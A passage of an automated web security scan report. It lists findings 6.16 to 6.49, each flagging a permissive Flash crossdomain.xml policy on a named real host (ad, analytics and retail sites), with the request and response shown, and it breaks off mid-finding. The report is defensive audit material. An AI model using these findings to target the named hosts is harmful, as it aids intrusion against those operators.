6.16. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:57:38 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


6.17. http://cebwa.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.18. http://cimg-1.restorationhardware.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cimg-1.restorationhardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cimg-1.restorationhardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "24406b-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=985
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://customerappreciation.petco.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://customerappreciation.petco.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: customerappreciation.petco.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:24 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "a6de0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=900
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://d.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:58:24 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.21. http://data.coremetrics.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "21c4c0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=851
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://dis.us.criteo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Mon, 16 May 2011 01:58:00 GMT
Expires: Thu, 10 May 2012 01:58:00 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.23. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 83614
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://gsicace.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:11 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.25. http://hire.jobvite.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hire.jobvite.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 18:27:10 GMT
Accept-Ranges: bytes
ETag: "093692a3928cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:20 GMT
Connection: close
Content-Length: 108

...<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.26. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:01:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.27. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.28. http://marketlive.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketlive.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.29. http://mbox12.offermatica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox12.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.30. http://media.fastclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:30 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19993
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.31. http://media.gnc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:58:34 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.32. http://media.gsimedia.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gsimedia.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:28 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:56:28 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.33. http://media2.legacy.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.34. http://metrics.brookstone.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:55 GMT
Server: Omniture DC/2.0.0
xserver: www287
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.35. http://metrics.ftd.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:37 GMT
Server: Omniture DC/2.0.0
xserver: www400
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.36. http://metrics.gnc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:43 GMT
Server: Omniture DC/2.0.0
xserver: www402
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.37. http://metrics.mcafee.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www295
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.38. http://metrics.pacsun.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www23
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.39. http://metrics.petsmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.40. http://mlarmani.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlarmani.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www80
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.41. http://o.toshibadirect.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www378
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.42. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 02:02:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.43. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:56:38 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 16 May 2011 01:56:38 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.44. http://rpt.footlocker.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rpt.footlocker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rpt.footlocker.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:27 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "16d800-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=998
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://s.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:31:41 GMT
Content-length: 202
Etag: "ca-4ceae13d"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.46. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:14 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 02:00:14 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.47. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.48. http://server.bhphotovideo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://server.bhphotovideo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.bhphotovideo.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:00 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "3a990e-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=978
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.49. http://sv.liveclicker.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
